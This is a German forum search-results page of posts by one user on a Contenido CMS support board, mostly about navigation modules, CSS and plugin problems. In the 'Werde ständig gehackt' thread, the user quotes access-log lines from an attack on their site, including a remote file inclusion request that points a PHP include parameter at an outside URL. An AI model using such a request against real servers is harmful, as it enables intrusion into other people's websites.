Die Suche ergab 59 Treffer

von speedmaster
Mo 8. Dez 2008, 20:11
Forum: Module und Plugins
Thema: MR deinstallieren
Antworten: 2
Zugriffe: 1605

MR deinstallieren

Hallo, gibt es eine Möglichkeit MR wieder zu entfernen?
Ich habe die Version 0.5.0rc installiert, und habe nur Probleme. Mit der 0.4.5 lief alles reibungslos. Nun möchte wieder auf diese Version umsteigen. :(
von speedmaster
Di 25. Nov 2008, 17:04
Forum: Allgemeine Themen
Thema: Werde ständig gehackt 4.8.8
Antworten: 4
Zugriffe: 902

Hier sind noch welche ohne Statuscode 403. 74.Red-88-2-188.staticIP.rima-tde.net - - [19/Nov/2008:02:36:19 +0100] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 200 12 "-" "Mozilla/5.0" swifttrim.com - - [19/Nov/2008:0...
von speedmaster
Di 25. Nov 2008, 16:48
Forum: Allgemeine Themen
Thema: Werde ständig gehackt 4.8.8
Antworten: 4
Zugriffe: 902

Hallo,

ja es handelt sich um eine komplette Neuinstalltion der 4.8.8.
Diese wird immer wieder gehackt. Es werden vom Angreifer .htaccess Dateien angelegt, die die URLs umschreiben, und somit einen Zugriff auf die Seite und den Adminbereich nicht mehr zulassen.
von speedmaster
Di 25. Nov 2008, 16:26
Forum: Allgemeine Themen
Thema: Werde ständig gehackt 4.8.8
Antworten: 4
Zugriffe: 902

Werde ständig gehackt 4.8.8

Hallo zusammen, meine Contenido Installation (4.8.8)wird ständig über die contenido/includes/include.newsletter_jobs_subnav.php gehackt. Ist dies eine bekannte Sicherheitslücke? Das ganze sieht in meinem logfile so aus: 74.Red-88-2-188.staticIP.rima-tde.net - - [19/Nov/2008:02:47:32 +0100] "GET /_de...
von speedmaster
Mo 6. Okt 2008, 11:20
Forum: Version 4.6
Thema: Modul :: NavigationUniversell
Antworten: 369
Zugriffe: 154226

Hallo MyAccount, danke für die rasche Antwort. Wenn ich es richtig verstehe, sollte das ganze also so aussehen: $aQnavigation->between(1, ''); $aQnavigation->maskNormal(1, '<li><a target="_self" href="{link}">{name1}</a></li>'); $aQnavigation->maskSelected(1, '<li><a target="_self" href="{link}">›{n...
von speedmaster
Fr 3. Okt 2008, 17:42
Forum: Version 4.6
Thema: Modul :: NavigationUniversell
Antworten: 369
Zugriffe: 154226

Reiternavigation

Hallo zusammen, erst einmal ein dickes Lob an den Entwickler für dieses tolle Modul, das ich super zum laufen gebracht habe. Nun meine Frage, ist es möglich mit diesem Modul eine Reiternavigation so wie hier http://clagnut.com/sandbox/csstabs/?writingtext=csstabs zu realisieren? Bin leider noch nich...
von speedmaster
Di 2. Sep 2008, 14:48
Forum: Module und Plugins
Thema: Plugin Advanced Mod Rewrite für Contenido 4.8.x
Antworten: 1309
Zugriffe: 367861

AHA. Alles klar. Danke für die rasche Antwort.
von speedmaster
Di 2. Sep 2008, 11:24
Forum: Module und Plugins
Thema: Plugin Advanced Mod Rewrite für Contenido 4.8.x
Antworten: 1309
Zugriffe: 367861

Start vom Hauptbaum aus?

Hallo zusammen und recht herzlichen Dank an den Entwickler des Plugins. :!: Leider habe ich ein kleines Problem damit. Ich habe alles nach Anleitung installiert. Jedoch funktioniert ModRewrite nur, wenn ich im Backend die Option "Start vom Hauptbaum aus" aktiviere. Dann werden meine URLs so dargeste...
von speedmaster
Mo 1. Sep 2008, 11:57
Forum: Version 4.6
Thema: Geschützte Seiten Fehler nach Update auf 4.6.24
Antworten: 2
Zugriffe: 1993

Hallo womic200,

ich habe auf 4.8.7 aktualisiert dann ging es wieder.
Alternativ kannste mal versuchen die Datei cms/front_crcloginform.inc.php aus deiner hoffentlich gemachten Datensicherung zurückzuspielen.
von speedmaster
So 24. Aug 2008, 18:16
Forum: Version 4.6
Thema: Geschützte Seiten Fehler nach Update auf 4.6.24
Antworten: 2
Zugriffe: 1993

Geschützte Seiten Fehler nach Update auf 4.6.24

Hallo zusammen, ich habe folgendes Problem. Seit dem Update von 4.6.23 auf 4.6.24 funktionieren meine Frontpageberechtigungen für meine geschützten Verzeichnisse nicht mehr. Nach dem Login werden die Verzeichnisse zwar angezeigt, aber wenn ich auf eine der geschützten Kategorien klicke, lande ich au...
von speedmaster
Fr 15. Aug 2008, 19:07
Forum: Version 4.6
Thema: neues modul :: splittedNavigation
Antworten: 106
Zugriffe: 62551

Vielen Dank, werde ich morgen gleich probieren.
von speedmaster
Do 14. Aug 2008, 13:43
Forum: Version 4.6
Thema: neues modul :: splittedNavigation
Antworten: 106
Zugriffe: 62551

selectednav für jede ebene separat ansprechen?

Hallo zusammen, wie kann ich jede einzelne Ebene der Navigation separat mit selectednav ansprechen? :?: z.B. nav_0#selectednav | für die erste Ebene nav_1#selectednav | für die zweite Ebene nav_2#selectednav | für die dritte Ebene nav_3#selectednav | für die vierte Ebene usw.. Code: if ($this->isSel...
von speedmaster
Mi 6. Aug 2008, 13:59
Forum: Version 4.6
Thema: Hilfsnavigation aktiv
Antworten: 2
Zugriffe: 2036

Hallo emergence,

danke für den Tipp, aber das funzt leider auch nicht. Wenn ich...

Code: Alles auswählen

a.additionalnavi:active{font-weight:bold;}
..verwende, so zieht diese Anweisung nur beim anklicken des Links.
Wenn die entsprechende Seite dann geladen hat, dann zieht diese Anweisung nicht mehr. :?:
von speedmaster
Di 5. Aug 2008, 11:51
Forum: Version 4.6
Thema: neues modul :: splittedNavigation
Antworten: 106
Zugriffe: 62551

Hat sich erledigt. Wer lesen kann ist deutlich im Vorteil. Hatte ich komplett überlesen. Folgendes muss im Output ausgetauscht werden: Ist Code: if ($this->isSelected($next)) { echo $this->beforeSelected; } else { echo $this->beforeEach; } echo '<a href="'.$link.'">'.$this->navigationTree[$parentId]...
von speedmaster
Di 5. Aug 2008, 08:22
Forum: Version 4.6
Thema: neues modul :: splittedNavigation
Antworten: 106
Zugriffe: 62551

Super Modul

Hallo, genau so ein Modul habe ich gesucht.
Jedoch hätte ich da noch eine Frage dazu.
Wie bekomme ich es gebacken, die aktiven Links zu formatieren?

Code: Alles auswählen

a:active.nav_0 {
font-weight:bold;
}
funktioniert nicht. :(